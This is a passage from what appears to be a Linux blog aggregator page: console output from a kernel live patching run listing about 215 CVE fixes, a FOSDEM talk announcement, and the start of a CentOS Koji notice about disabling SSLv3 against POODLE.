Install [x8q709jt] CVE-2010-2963: Kernel memory overwrite in VIDIOCSMICROCODE.
Install [ff1wrijq] Buffer overflow in icmpmsg_put.
Install [4iixzl59] CVE-2010-3432: Remote denial of service vulnerability in SCTP.
Install [7oqt6tqc] CVE-2010-3442: Heap corruption vulnerability in ALSA core.
Install [ittquyax] CVE-2010-3865: Integer overflow in RDS rdma page counting.
Install [0bpdua1b] CVE-2010-3876: Kernel information leak in packet subsystem.
Install [ugjt4w1r] CVE-2010-4083: Kernel information leak in semctl syscall.
Install [n9l81s9q] CVE-2010-4248: Race condition in __exit_signal with multithreaded exec.
Install [68zq0p4d] CVE-2010-4242: NULL pointer dereference in Bluetooth HCI UART driver.
Install [cggc9uy2] CVE-2010-4157: Memory corruption in Intel/ICP RAID driver.
Install [f5ble6od] CVE-2010-3880: Logic error in INET_DIAG bytecode auditing.
Install [gwuiufjq] CVE-2010-3858: Denial of service vulnerability with large argument lists.
Install [usukkznh] Mitigate denial of service attacks with large argument lists.
Install [5tq2ob60] CVE-2010-4161: Deadlock in socket queue subsystem.
Install [oz6k77bm] CVE-2010-3859: Heap overflow vulnerability in TIPC protocol.
Install [uzil3ohn] CVE-2010-3296: Kernel information leak in cxgb driver.
Install [wr9nr8zt] CVE-2010-3877: Kernel information leak in tipc driver.
Install [5wrnhakw] CVE-2010-4073: Kernel information leaks in ipc compat subsystem.
Install [hnbz3ppf] Integer overflow in sys_remap_file_pages.
Install [oxczcczj] CVE-2010-4258: Failure to revert address limit override after oops.
Install [t44v13q4] CVE-2010-4075: Kernel information leak in serial core.
Install [8p4jsino] CVE-2010-4080 and CVE-2010-4081: Information leaks in sound drivers.
Install [3raind7m] CVE-2010-4243: Denial of service due to wrong execve memory accounting.
Install [od2bcdwj] CVE-2010-4158: Kernel information leak in socket filters.
Install [zbxtr4my] CVE-2010-4526: Remote denial of service vulnerability in SCTP.
Install [mscc8dnf] CVE-2010-4655: Information leak in ethtool_get_regs.
Install [8r9231h7] CVE-2010-4249: Local denial of service vulnerability in UNIX sockets.
Install [2lhgep6i] Panic in kfree() due to race condition in acpi_bus_receive_event.
Install [uaypv955] Fix connection timeouts due to shrinking tcp window with window scaling.
Install [7klbps5h] CVE-2010-1188: Use after free bug in tcp_rcv_state_process.
Install [u340317o] CVE-2011-1478: NULL dereference in GRO with promiscuous mode.
Install [ttqhpxux] CVE-2010-4346: mmap_min_addr bypass in install_special_mapping.
Install [ifgdet83] Use-after-free in MPT driver.
Install [2n7dcbk9] CVE-2011-1010: Denial of service parsing malformed Mac OS partition tables.
Install [cy964b8w] CVE-2011-1090: Denial of Service in NFSv4 client.
Install [6e28ii3e] CVE-2011-1079: Missing validation in bnep_sock_ioctl.
Install [gw5pjusn] CVE-2011-1093: Remote Denial of Service in DCCP.
Install [23obo960] CVE-2011-0726: Information leak in /proc/[pid]/stat.
Install [pbxuj96b] CVE-2011-1080, CVE-2011-1170, CVE-2011-1171, CVE-2011-1172: Information leaks in netfilter.
Install [9oepi0rc] Buffer overflow in iptables CLUSTERIP target.
Install [nguvvw6h] CVE-2011-1163: Kernel information leak parsing malformed OSF partition tables.
Install [8v9d3ton] USB Audio regression introduced by CVE-2010-1083 fix.
Install [jz43fdgc] Denial of service in NFS server via reference count leak.
Install [h860edrq] Fix a packet flood when initializing a bridge device without STP.
Install [3xcb5ffu] CVE-2011-1577: Missing boundary checks in GPT partition handling.
Install [wvcxkbxq] CVE-2011-1078: Information leak in Bluetooth sco.
Install [n5a8jgv9] CVE-2011-1494, CVE-2011-1495: Privilege escalation in LSI MPT Fusion SAS 2.0 driver.
Install [3t5fgeqc] CVE-2011-1576: Denial of service with VLAN packets and GRO.
Install [qsvqaynq] CVE-2011-0711: Information leak in XFS filesystem.
Install [m1egxmrj] CVE-2011-1573: Remote denial of service in SCTP.
Install [fexakgig] CVE-2011-1776: Missing validation for GPT partitions.
Install [rrnm0hzm] CVE-2011-0695: Remote denial of service in InfiniBand setup.
Install [c50ijj1f] CVE-2010-4649, CVE-2011-1044: Buffer overflow in InfiniBand uverb handling.
Install [eywxeqve] CVE-2011-1745, CVE-2011-2022: Privilege escalation in AGP subsystem.
Install [u83h3kej] CVE-2011-1746: Integer overflow in agp_allocate_memory.
Install [kcmghb3m] CVE-2011-1593: Denial of service in next_pidmap.
Install [s113zod3] CVE-2011-1182: Missing validation check in signals implementation.
Install [2xn5hnvr] CVE-2011-2213: Denial of service in inet_diag_bc_audit.
Install [fznr6cbr] CVE-2011-2492: Information leak in bluetooth implementation.
Install [nzhpmyaa] CVE-2011-2525: Denial of Service in packet scheduler API
Install [djng1uvs] CVE-2011-2482: Remote denial of service vulnerability in SCTP.
Install [mbg8auhk] CVE-2011-2495: Information leak in /proc/PID/io.
Install [ofrder8l] Hangs using direct I/O with XFS filesystem.
Install [tqkgmwz7] CVE-2011-2491: Local denial of service in NLM subsystem.
Install [wkw7j4ov] CVE-2011-1160: Information leak in tpm driver.
Install [1f4r424i] CVE-2011-1585: Authentication bypass in CIFS.
Install [kr0lofug] CVE-2011-2484: Denial of service in taskstats subsystem.
Install [zm5fxh2c] CVE-2011-2496: Local denial of service in mremap().
Install [4f8zud01] CVE-2009-4067: Buffer overflow in Auerswald usb driver.
Install [qgzezhlj] CVE-2011-2695: Off-by-one errors in the ext4 filesystem.
Install [fy2peril] CVE-2011-2699: Predictable IPv6 fragment identification numbers.
Install [idapn9ej] CVE-2011-2723: Remote denial of service vulnerability in gro.
Install [i1q0saw7] CVE-2011-1833: Information disclosure in eCryptfs.
Install [uqv087lb] CVE-2011-3191: Memory corruption in CIFSFindNext.
Install [drz5ixw2] CVE-2011-3209: Denial of Service in clock implementation.
Install [2zawfk0b] CVE-2011-3188: Weak TCP sequence number generation.
Install [7gkvlyfi] CVE-2011-3363: Remote denial of service in cifs_mount.
Install [8einfy3y] CVE-2011-4110: Null pointer dereference in key subsystem.
Install [w9l57w7p] CVE-2011-1162: Information leak in TPM driver.
Install [hl96s86z] CVE-2011-2494: Information leak in task/process statistics.
Install [5vsbttwa] CVE-2011-2203: Null pointer dereference mounting HFS filesystems.
Install [ycoswcar] CVE-2011-4077: Buffer overflow in xfs_readlink.
Install [rw8qiogc] CVE-2011-4132: Denial of service in Journaling Block Device layer.
Install [erniwich] CVE-2011-4330: Buffer overflow in HFS file name translation logic.
Install [q6rd6uku] CVE-2011-4324: Denial of service vulnerability in NFSv4.
Install [vryc0xqm] CVE-2011-4325: Denial of service in NFS direct-io.
Install [keb8azcn] CVE-2011-4348: Socket locking race in SCTP.
Install [yvevd42a] CVE-2011-1020, CVE-2011-3637: Information leak, DoS in /proc.
Install [thzrtiaw] CVE-2011-4086: Denial of service in journaling block device.
Install [y5efh27f] CVE-2012-0028: Privilege escalation in user-space futexes.
Install [wxdx4x4i] CVE-2011-3638: Disk layout corruption bug in ext4 filesystem.
Install [cd2g2hvz] CVE-2011-4127: KVM privilege escalation through insufficient validation in SG_IO ioctl.
Install [aqo49k28] CVE-2011-1083: Algorithmic denial of service in epoll.
Install [uknrp2eo] Denial of service in filesystem unmounting.
Install [97u6urvt] Soft lockup in USB ACM driver.
Install [01uynm3o] CVE-2012-1583: use-after-free in IPv6 tunneling.
Install [loizuvxu] Kernel crash in Ethernet bridging netfilter module.
Install [yc146ytc] Unresponsive I/O using QLA2XXX driver.
Install [t92tukl1] CVE-2012-2136: Privilege escalation in TUN/TAP virtual device.
Install [aldzpxho] CVE-2012-3375: Denial of service due to epoll resource leak in error path.
Install [bvoz27gv] Arithmetic overflow in clock source calculations.
Install [lzwurn1u] ext4 filesystem corruption on fallocate.
Install [o9b62qf6] CVE-2012-2313: Privilege escalation in the dl2k NIC.
Install [9do532u6] Kernel panic when overcommiting memory with NFSd.
Install [zf95qrnx] CVE-2012-2319: Buffer overflow mounting corrupted hfs filesystem.
Install [fx2rxv2q] CVE-2012-3430: kernel information leak in RDS sockets.
Install [wo638apk] CVE-2012-2100: Divide-by-zero mounting an ext4 filesystem.
Install [ivl1wsvt] CVE-2012-2372: Denial of service in Reliable Datagram Sockets protocol.
Install [xl2q6gwk] CVE-2012-3552: Denial-of-service in IP options handling.
Install [l093jvcl] Kernel panic in SMB extended attributes.
Install [qlzoyvty] Kernel panic in ext3 indirect blocks.
Install [8lj9n3i6] CVE-2012-1568: A predictable base address with shared libraries and ASLR.
Install [qn1rqea3] CVE-2012-4444: Prohibit reassembling IPv6 fragments when some data overlaps.
Install [wed7w5th] CVE-2012-3400: Buffer overflow in UDF parsing.
Install [n2dqx9n3] CVE-2013-0268: /dev/cpu/*/msr local privilege escalation.
Install [p8oacpis] CVE-2013-0871: Privilege escalation in PTRACE_SETREGS.
Install [cbdr6azh] CVE-2012-6537: Kernel information leaks in network transformation subsystem.
Install [1qz0f4lv] CVE-2013-1826: NULL pointer dereference in XFRM buffer size mismatch.
Install [s0q68mb1] CVE-2012-6547: Kernel stack leak from TUN ioctls.
Install [s1c6y3ee] CVE-2012-6546: Information leak in ATM sockets.
Install [2zzz6cqb] Data corruption on NFSv3/v2 short reads.
Install [kfav9h9d] CVE-2012-6545: Information leak in Bluetooth RFCOMM socket name.
Install [coeq937e] CVE-2013-3222: Kernel stack information leak in ATM sockets.
Install [43shl6vr] CVE-2013-3224: Kernel stack information leak in Bluetooth sockets.
Install [whoojewf] CVE-2013-3235: Kernel stack information leak in TIPC protocol.
Install [7vap7ys6] CVE-2012-6544: Information leak in Bluetooth L2CAP socket name.
Install [0xjd0c1r] CVE-2013-0914: Information leak in signal handlers.
Install [l2925frf] CVE-2013-2147: Kernel memory leak in Compaq Smart Array controllers.
Install [lt4qe1dr] CVE-2013-2164: Kernel information leak in the CDROM driver.
Install [7fkc8czu] CVE-2013-2234: Information leak in IPsec key management.
Install [0t3omxv5] CVE-2013-2237: Information leak on IPSec key socket.
Install [e1jtiocl] CVE-2013-2232: Memory corruption in IPv6 routing cache.
Install [f0bqnvc1] CVE-2013-2206: NULL pointer dereference in SCTP duplicate cookie handling.
Install [v188ww9y] CVE-2013-2141: Information leak in tkill() and tgkill() system calls.
Install [0amslrok] CVE-2013-4162: Denial-of-service with IPv6 sockets with UDP_CORK.
Install [s4w6qq7g] CVE-2012-3511: Use-after-free due to race condition in madvise.
Install [kvnlhbh1] CVE-2012-4398: Denial-of-service in kernel module loading.
Install [k77237db] CVE-2013-4299: Information leak in device mapper persistent snapshots.
Install [ekv19fgd] CVE-2013-4345: Off-by-one in the ANSI Crypto RNG.
Install [pl4pqen7] CVE-2013-0343: Denial of service in IPv6 privacy extensions.
Install [ku36xnjx] Incorrect handling of SCSI scatter-gather list mapping failures.
Install [9jc4vajb] CVE-2013-6383: Missing capability check in AAC RAID compatibility ioctl.
Install [66nk6gwh] CVE-2013-2929: Incorrect permissions check in ptrace with dropped privileges.
Install [1vays5jg] CVE-2013-7263: Information leak in IPv4 and IPv6 socket recvmsg.
Install [g8wy6r2k] CVE-2013-4483: Denial-of-service in IPC subsystem when taking a reference count.
Install [617yrxdl] CVE-2012-6638: Denial-of-service in TCP's SYN+FIN messages.
Install [pp6j74s7] CVE-2013-2888: Kernel memory corruption flaw via oversize HID report id.
Install [pz65qqpk] Panic in GFS2 filesystem locking code.
Install [p4focqhi] CVE-2014-1737, CVE-2014-1738: Local privilege escalation in floppy ioctl.
Install [6w9u3383] CVE-2013-7339: NULL pointer dereference in RDS socket binding.
Install [xqpvy7zh] CVE-2014-4699: Privilege escalation in ptrace() RIP modification.
Install [ghkc42rj] CVE-2014-2678: NULL pointer dereference in RDS protocol when binding.
Install [g4qbxm30] CVE-2014-3917: Denial-of-service and information leak in audit syscall subsystem.
Install [eit799o3] Memory leak in GFS2 filesystem for files with short lifespan.
Installing [v5267zuo] Clear garbage data on the kernel stack when handling signals.
Installing [u4puutmx] CVE-2009-2849: NULL pointer dereference in md.
Installing [302jzohc] CVE-2009-3286: Incorrect permissions check in NFSv4.
Installing [k6oev8o2] CVE-2009-3228: Information leaks in networking systems.
Installing [tvbl43gm] CVE-2009-3613: Remote denial of service in r8169 driver.
Installing [690q6ok1] CVE-2009-2908: NULL pointer dereference in eCryptfs.
Installing [ijp9g555] CVE-2009-3547: NULL pointer dereference opening pipes.
Installing [1ala9dhk] CVE-2009-2695: SELinux does not enforce mmap_min_addr sysctl.
Installing [5fq3svyl] CVE-2009-3621: Denial of service shutting down abstract-namespace sockets.
Installing [bjdsctfo] CVE-2009-3620: NULL pointer dereference in ATI Rage 128 driver.
Installing [lzvczyai] CVE-2009-3726: NFSv4: Denial of Service in NFS client.
Installing [25vdhdv7] CVE-2009-3612: Information leak in the netlink subsystem.
Installing [wmkvlobl] CVE-2007-4567: Remote denial of service in IPv6
Installing [ejk1k20m] CVE-2009-4538: Denial of service in e1000e driver.
Installing [c5das3zq] CVE-2009-4537: Buffer underflow in r8169 driver.
Installing [issxhwza] CVE-2009-4536: Denial of service in e1000 driver.
Installing [kyibbr3e] CVE-2009-4141: Local privilege escalation in fasync_helper().
Installing [jfp36tzw] CVE-2009-3080: Privilege Escalation in GDT driver.
Installing [4746ikud] CVE-2009-4021: Denial of service in fuse_direct_io.
Installing [234ls00d] CVE-2009-4020: Buffer overflow mounting corrupted hfs filesystem.
Installing [ffi8v0vl] CVE-2009-4272: Remote DOS vulnerabilities in routing hash table.
Installing [fesxf892] CVE-2006-6304: Rewrite attack flaw in do_coredump.
Installing [43o4k8ow] CVE-2009-4138: NULL pointer dereference flaw in firewire-ohci driver.
Installing [9xzs9dxx] Kernel panic in do_wp_page under heavy I/O load.
Installing [qdlkztzx] Kernel crash forwarding network traffic.
Installing [ufo0resg] CVE-2010-0437: NULL pointer dereference in ip6_dst_lookup_tail.
Installing [490guso5] CVE-2010-0007: Missing capabilities check in ebtables module.
Installing [zwn5ija2] CVE-2010-0415: Information Leak in sys_move_pages
Installing [n8227iv2] CVE-2009-4308: NULL pointer dereference in ext4 decoding EROFS w/o a journal.
Installing [988ux06h] CVE-2009-4307: Divide-by-zero mounting an ext4 filesystem.
Installing [2jp2pio6] CVE-2010-0727: Denial of Service in GFS2 locking.
Installing [xem0m4sg] Floating point state corruption after signal.
Installing [bkwy53ji] CVE-2010-1085: Divide-by-zero in Intel HDA driver.
Installing [3ulklysv] CVE-2010-0307: Denial of service on amd64
Installing [jda1w8ml] CVE-2010-1436: Privilege escalation in GFS2 server
Installing [trws48lp] CVE-2010-1087: Oops when truncating a file in NFS
Installing [ij72ubb6] CVE-2010-1088: Privilege escalation with automount symlinks
Installing [gmqqylxv] CVE-2010-1187: Denial of service in TIPC
Installing [3a24ltr0] CVE-2010-0291: Multiple denial of service bugs in mmap and mremap
Installing [7mm0u6cz] CVE-2010-1173: Remote denial of service in SCTP
Installing [fd1x4988] CVE-2010-0622: Privilege escalation by futex corruption
Installing [l5qljcxc] CVE-2010-1437: Privilege escalation in key management
Installing [xs69oy0y] CVE-2010-1641: Permission check bypass in GFS2
Installing [lgmry5fa] CVE-2010-1084: Privilege escalation in Bluetooth subsystem.
Installing [j7m6cafl] CVE-2010-2248: Remote denial of service in CIFS client.
Installing [avqwduk3] CVE-2010-2524: False CIFS mount via DNS cache poisoning.
Installing [6qplreu2] CVE-2010-2521: Remote buffer overflow in NFSv4 server.
Installing [5ohnc2ho] CVE-2010-2226: Read access to write-only files in XFS filesystem.
Installing [i5ax6hf4] CVE-2010-2240: Privilege escalation vulnerability in memory management.
Installing [50ydcp2k] CVE-2010-3081: Privilege escalation through stack underflow in compat.
Installing [59car2zc] CVE-2010-2798: Denial of service in GFS2.
Installing [dqjlyw67] CVE-2010-2492: Privilege Escalation in eCryptfs.
Installing [5mgd1si0] Improved fix to CVE-2010-1173.
Installing [qr5isvgk] CVE-2010-3015: Integer overflow in ext4 filesystem.
Installing [sxeo6c33] CVE-2010-1083: Information leak in USB implementation.
Installing [mzgdwuwp] CVE-2010-2942: Information leaks in traffic control dump structures.
Installing [19jigi5v] CVE-2010-3904: Local privilege escalation vulnerability in RDS sockets.
Installing [rg7pe3n8] CVE-2010-3067: Information leak in sys_io_submit.
Installing [n3tg4mky] CVE-2010-3078: Information leak in xfs_ioc_fsgetxattr.
Installing [s2y6oq9n] CVE-2010-3086: Denial of Service in futex atomic operations.
Installing [9subq5sx] CVE-2010-3477: Information leak in tcf_act_police_dump.
Installing [x8q709jt] CVE-2010-2963: Kernel memory overwrite in VIDIOCSMICROCODE.
Installing [ff1wrijq] Buffer overflow in icmpmsg_put.
Installing [4iixzl59] CVE-2010-3432: Remote denial of service vulnerability in SCTP.
Installing [7oqt6tqc] CVE-2010-3442: Heap corruption vulnerability in ALSA core.
Installing [ittquyax] CVE-2010-3865: Integer overflow in RDS rdma page counting.
Installing [0bpdua1b] CVE-2010-3876: Kernel information leak in packet subsystem.
Installing [ugjt4w1r] CVE-2010-4083: Kernel information leak in semctl syscall.
Installing [n9l81s9q] CVE-2010-4248: Race condition in __exit_signal with multithreaded exec.
Installing [68zq0p4d] CVE-2010-4242: NULL pointer dereference in Bluetooth HCI UART driver.
Installing [cggc9uy2] CVE-2010-4157: Memory corruption in Intel/ICP RAID driver.
Installing [f5ble6od] CVE-2010-3880: Logic error in INET_DIAG bytecode auditing.
Installing [gwuiufjq] CVE-2010-3858: Denial of service vulnerability with large argument lists.
Installing [usukkznh] Mitigate denial of service attacks with large argument lists.
Installing [5tq2ob60] CVE-2010-4161: Deadlock in socket queue subsystem.
Installing [oz6k77bm] CVE-2010-3859: Heap overflow vulnerability in TIPC protocol.
Installing [uzil3ohn] CVE-2010-3296: Kernel information leak in cxgb driver.
Installing [wr9nr8zt] CVE-2010-3877: Kernel information leak in tipc driver.
Installing [5wrnhakw] CVE-2010-4073: Kernel information leaks in ipc compat subsystem.
Installing [hnbz3ppf] Integer overflow in sys_remap_file_pages.
Installing [oxczcczj] CVE-2010-4258: Failure to revert address limit override after oops.
Installing [t44v13q4] CVE-2010-4075: Kernel information leak in serial core.
Installing [8p4jsino] CVE-2010-4080 and CVE-2010-4081: Information leaks in sound drivers.
Installing [3raind7m] CVE-2010-4243: Denial of service due to wrong execve memory accounting.
Installing [od2bcdwj] CVE-2010-4158: Kernel information leak in socket filters.
Installing [zbxtr4my] CVE-2010-4526: Remote denial of service vulnerability in SCTP.
Installing [mscc8dnf] CVE-2010-4655: Information leak in ethtool_get_regs.
Installing [8r9231h7] CVE-2010-4249: Local denial of service vulnerability in UNIX sockets.
Installing [2lhgep6i] Panic in kfree() due to race condition in acpi_bus_receive_event.
Installing [uaypv955] Fix connection timeouts due to shrinking tcp window with window scaling.
Installing [7klbps5h] CVE-2010-1188: Use after free bug in tcp_rcv_state_process.
Installing [u340317o] CVE-2011-1478: NULL dereference in GRO with promiscuous mode.
Installing [ttqhpxux] CVE-2010-4346: mmap_min_addr bypass in install_special_mapping.
Installing [ifgdet83] Use-after-free in MPT driver.
Installing [2n7dcbk9] CVE-2011-1010: Denial of service parsing malformed Mac OS partition tables.
Installing [cy964b8w] CVE-2011-1090: Denial of Service in NFSv4 client.
Installing [6e28ii3e] CVE-2011-1079: Missing validation in bnep_sock_ioctl.
Installing [gw5pjusn] CVE-2011-1093: Remote Denial of Service in DCCP.
Installing [23obo960] CVE-2011-0726: Information leak in /proc/[pid]/stat.
Installing [pbxuj96b] CVE-2011-1080, CVE-2011-1170, CVE-2011-1171, CVE-2011-1172: Information leaks in netfilter.
Installing [9oepi0rc] Buffer overflow in iptables CLUSTERIP target.
Installing [nguvvw6h] CVE-2011-1163: Kernel information leak parsing malformed OSF partition tables.
Installing [8v9d3ton] USB Audio regression introduced by CVE-2010-1083 fix.
Installing [jz43fdgc] Denial of service in NFS server via reference count leak.
Installing [h860edrq] Fix a packet flood when initializing a bridge device without STP.
Installing [3xcb5ffu] CVE-2011-1577: Missing boundary checks in GPT partition handling.
Installing [wvcxkbxq] CVE-2011-1078: Information leak in Bluetooth sco.
Installing [n5a8jgv9] CVE-2011-1494, CVE-2011-1495: Privilege escalation in LSI MPT Fusion SAS 2.0 driver.
Installing [3t5fgeqc] CVE-2011-1576: Denial of service with VLAN packets and GRO.
Installing [qsvqaynq] CVE-2011-0711: Information leak in XFS filesystem.
Installing [m1egxmrj] CVE-2011-1573: Remote denial of service in SCTP.
Installing [fexakgig] CVE-2011-1776: Missing validation for GPT partitions.
Installing [rrnm0hzm] CVE-2011-0695: Remote denial of service in InfiniBand setup.
Installing [c50ijj1f] CVE-2010-4649, CVE-2011-1044: Buffer overflow in InfiniBand uverb handling.
Installing [eywxeqve] CVE-2011-1745, CVE-2011-2022: Privilege escalation in AGP subsystem.
Installing [u83h3kej] CVE-2011-1746: Integer overflow in agp_allocate_memory.
Installing [kcmghb3m] CVE-2011-1593: Denial of service in next_pidmap.
Installing [s113zod3] CVE-2011-1182: Missing validation check in signals implementation.
Installing [2xn5hnvr] CVE-2011-2213: Denial of service in inet_diag_bc_audit.
Installing [fznr6cbr] CVE-2011-2492: Information leak in bluetooth implementation.
Installing [nzhpmyaa] CVE-2011-2525: Denial of Service in packet scheduler API
Installing [djng1uvs] CVE-2011-2482: Remote denial of service vulnerability in SCTP.
Installing [mbg8auhk] CVE-2011-2495: Information leak in /proc/PID/io.
Installing [ofrder8l] Hangs using direct I/O with XFS filesystem.
Installing [tqkgmwz7] CVE-2011-2491: Local denial of service in NLM subsystem.
Installing [wkw7j4ov] CVE-2011-1160: Information leak in tpm driver.
Installing [1f4r424i] CVE-2011-1585: Authentication bypass in CIFS.
Installing [kr0lofug] CVE-2011-2484: Denial of service in taskstats subsystem.
Installing [zm5fxh2c] CVE-2011-2496: Local denial of service in mremap().
Installing [4f8zud01] CVE-2009-4067: Buffer overflow in Auerswald usb driver.
Installing [qgzezhlj] CVE-2011-2695: Off-by-one errors in the ext4 filesystem.
Installing [fy2peril] CVE-2011-2699: Predictable IPv6 fragment identification numbers.
Installing [idapn9ej] CVE-2011-2723: Remote denial of service vulnerability in gro.
Installing [i1q0saw7] CVE-2011-1833: Information disclosure in eCryptfs.
Installing [uqv087lb] CVE-2011-3191: Memory corruption in CIFSFindNext.
Installing [drz5ixw2] CVE-2011-3209: Denial of Service in clock implementation.
Installing [2zawfk0b] CVE-2011-3188: Weak TCP sequence number generation.
Installing [7gkvlyfi] CVE-2011-3363: Remote denial of service in cifs_mount.
Installing [8einfy3y] CVE-2011-4110: Null pointer dereference in key subsystem.
Installing [w9l57w7p] CVE-2011-1162: Information leak in TPM driver.
Installing [hl96s86z] CVE-2011-2494: Information leak in task/process statistics.
Installing [5vsbttwa] CVE-2011-2203: Null pointer dereference mounting HFS filesystems.
Installing [ycoswcar] CVE-2011-4077: Buffer overflow in xfs_readlink.
Installing [rw8qiogc] CVE-2011-4132: Denial of service in Journaling Block Device layer.
Installing [erniwich] CVE-2011-4330: Buffer overflow in HFS file name translation logic.
Installing [q6rd6uku] CVE-2011-4324: Denial of service vulnerability in NFSv4.
Installing [vryc0xqm] CVE-2011-4325: Denial of service in NFS direct-io.
Installing [keb8azcn] CVE-2011-4348: Socket locking race in SCTP.
Installing [yvevd42a] CVE-2011-1020, CVE-2011-3637: Information leak, DoS in /proc.
Installing [thzrtiaw] CVE-2011-4086: Denial of service in journaling block device.
Installing [y5efh27f] CVE-2012-0028: Privilege escalation in user-space futexes.
Installing [wxdx4x4i] CVE-2011-3638: Disk layout corruption bug in ext4 filesystem.
Installing [cd2g2hvz] CVE-2011-4127: KVM privilege escalation through insufficient validation in SG_IO ioctl.
Installing [aqo49k28] CVE-2011-1083: Algorithmic denial of service in epoll.
Installing [uknrp2eo] Denial of service in filesystem unmounting.
Installing [97u6urvt] Soft lockup in USB ACM driver.
Installing [01uynm3o] CVE-2012-1583: use-after-free in IPv6 tunneling.
Installing [loizuvxu] Kernel crash in Ethernet bridging netfilter module.
Installing [yc146ytc] Unresponsive I/O using QLA2XXX driver.
Installing [t92tukl1] CVE-2012-2136: Privilege escalation in TUN/TAP virtual device.
Installing [aldzpxho] CVE-2012-3375: Denial of service due to epoll resource leak in error path.
Installing [bvoz27gv] Arithmetic overflow in clock source calculations.
Installing [lzwurn1u] ext4 filesystem corruption on fallocate.
Installing [o9b62qf6] CVE-2012-2313: Privilege escalation in the dl2k NIC.
Installing [9do532u6] Kernel panic when overcommiting memory with NFSd.
Installing [zf95qrnx] CVE-2012-2319: Buffer overflow mounting corrupted hfs filesystem.
Installing [fx2rxv2q] CVE-2012-3430: kernel information leak in RDS sockets.
Installing [wo638apk] CVE-2012-2100: Divide-by-zero mounting an ext4 filesystem.
Installing [ivl1wsvt] CVE-2012-2372: Denial of service in Reliable Datagram Sockets protocol.
Installing [xl2q6gwk] CVE-2012-3552: Denial-of-service in IP options handling.
Installing [l093jvcl] Kernel panic in SMB extended attributes.
Installing [qlzoyvty] Kernel panic in ext3 indirect blocks.
Installing [8lj9n3i6] CVE-2012-1568: A predictable base address with shared libraries and ASLR.
Installing [qn1rqea3] CVE-2012-4444: Prohibit reassembling IPv6 fragments when some data overlaps.
Installing [wed7w5th] CVE-2012-3400: Buffer overflow in UDF parsing.
Installing [n2dqx9n3] CVE-2013-0268: /dev/cpu/*/msr local privilege escalation.
Installing [p8oacpis] CVE-2013-0871: Privilege escalation in PTRACE_SETREGS.
Installing [cbdr6azh] CVE-2012-6537: Kernel information leaks in network transformation subsystem.
Installing [1qz0f4lv] CVE-2013-1826: NULL pointer dereference in XFRM buffer size mismatch.
Installing [s0q68mb1] CVE-2012-6547: Kernel stack leak from TUN ioctls.
Installing [s1c6y3ee] CVE-2012-6546: Information leak in ATM sockets.
Installing [2zzz6cqb] Data corruption on NFSv3/v2 short reads.
Installing [kfav9h9d] CVE-2012-6545: Information leak in Bluetooth RFCOMM socket name.
Installing [coeq937e] CVE-2013-3222: Kernel stack information leak in ATM sockets.
Installing [43shl6vr] CVE-2013-3224: Kernel stack information leak in Bluetooth sockets.
Installing [whoojewf] CVE-2013-3235: Kernel stack information leak in TIPC protocol.
Installing [7vap7ys6] CVE-2012-6544: Information leak in Bluetooth L2CAP socket name.
Installing [0xjd0c1r] CVE-2013-0914: Information leak in signal handlers.
Installing [l2925frf] CVE-2013-2147: Kernel memory leak in Compaq Smart Array controllers.
Installing [lt4qe1dr] CVE-2013-2164: Kernel information leak in the CDROM driver.
Installing [7fkc8czu] CVE-2013-2234: Information leak in IPsec key management.
Installing [0t3omxv5] CVE-2013-2237: Information leak on IPSec key socket.
Installing [e1jtiocl] CVE-2013-2232: Memory corruption in IPv6 routing cache.
Installing [f0bqnvc1] CVE-2013-2206: NULL pointer dereference in SCTP duplicate cookie handling.
Installing [v188ww9y] CVE-2013-2141: Information leak in tkill() and tgkill() system calls.
Installing [0amslrok] CVE-2013-4162: Denial-of-service with IPv6 sockets with UDP_CORK.
Installing [s4w6qq7g] CVE-2012-3511: Use-after-free due to race condition in madvise.
Installing [kvnlhbh1] CVE-2012-4398: Denial-of-service in kernel module loading.
Installing [k77237db] CVE-2013-4299: Information leak in device mapper persistent snapshots.
Installing [ekv19fgd] CVE-2013-4345: Off-by-one in the ANSI Crypto RNG.
Installing [pl4pqen7] CVE-2013-0343: Denial of service in IPv6 privacy extensions.
Installing [ku36xnjx] Incorrect handling of SCSI scatter-gather list mapping failures.
Installing [9jc4vajb] CVE-2013-6383: Missing capability check in AAC RAID compatibility ioctl.
Installing [66nk6gwh] CVE-2013-2929: Incorrect permissions check in ptrace with dropped privileges.
Installing [1vays5jg] CVE-2013-7263: Information leak in IPv4 and IPv6 socket recvmsg.
Installing [g8wy6r2k] CVE-2013-4483: Denial-of-service in IPC subsystem when taking a reference count.
Installing [617yrxdl] CVE-2012-6638: Denial-of-service in TCP's SYN+FIN messages.
Installing [pp6j74s7] CVE-2013-2888: Kernel memory corruption flaw via oversize HID report id.
Installing [pz65qqpk] Panic in GFS2 filesystem locking code.
Installing [p4focqhi] CVE-2014-1737, CVE-2014-1738: Local privilege escalation in floppy ioctl.
Installing [6w9u3383] CVE-2013-7339: NULL pointer dereference in RDS socket binding.
Installing [xqpvy7zh] CVE-2014-4699: Privilege escalation in ptrace() RIP modification.
Installing [ghkc42rj] CVE-2014-2678: NULL pointer dereference in RDS protocol when binding.
Installing [g4qbxm30] CVE-2014-3917: Denial-of-service and information leak in audit syscall subsystem.
Installing [eit799o3] Memory leak in GFS2 filesystem for files with short lifespan.
Your kernel is fully up to date.
Effective kernel version is 2.6.18-398.el5

real	0m59.447s
user	0m22.640s
sys	0m22.611s
1 minute for 215 updates. And this isn't one minute of hang: it applies each patch in turn, and each one takes only a few microseconds to apply, so your applications or users won't experience hangs or hiccups at all.

by wcoekaer at October 15, 2014 09:09 PM

FOSDEM organizers

First main track presentations!

We received a lot of good proposals and deciding which ones to accept is not an easy task. A number of proposals are still being reviewed and we are still working with some speakers. We can already announce the following main track presentations (title, speaker):

Performance track
Building High-Performance Language Implementations With Low Effort (Stefan Marr)
IgProf (Giulio Eulisse)
Superoptimization (James Pallister)
Ubiquitous Performance Analysis and System Introspection (Lukas Berk)

Time track
Computers, Clocks and Network Time (George Neville-Neil)

Languages track
Design and Implementation of a Perl Number Theory Module (Dana Jacobsen)

October 15, 2014 03:00 PM

Fabian Arrotin

Koji – CentOS CBS infra and sslv3/Poodle important notification

As most of you already know, there is an important SSLv3 vulnerability (CVE-2014-3566, see https://access.redhat.com/articles/1232123), known as Poodle.
While it's easy to disable SSLv3 in the allowed protocols at the server level (for example SSLProtocol All -SSLv2 -SSLv3 for Apache), some clients still default to SSLv3, and Koji does that.

We have now disabled SSLv3 on our cbs.centos.org Koji instance, so if you're a cbs/koji user, please adapt your local koji package (local fix!).
At the moment there is no upstream package available, but the following patch has been tested by Fedora people too (credits go to

https://lists.fedoraproject.org/pipermail/infrastructure/2014-October/014976.html)

=====================================================
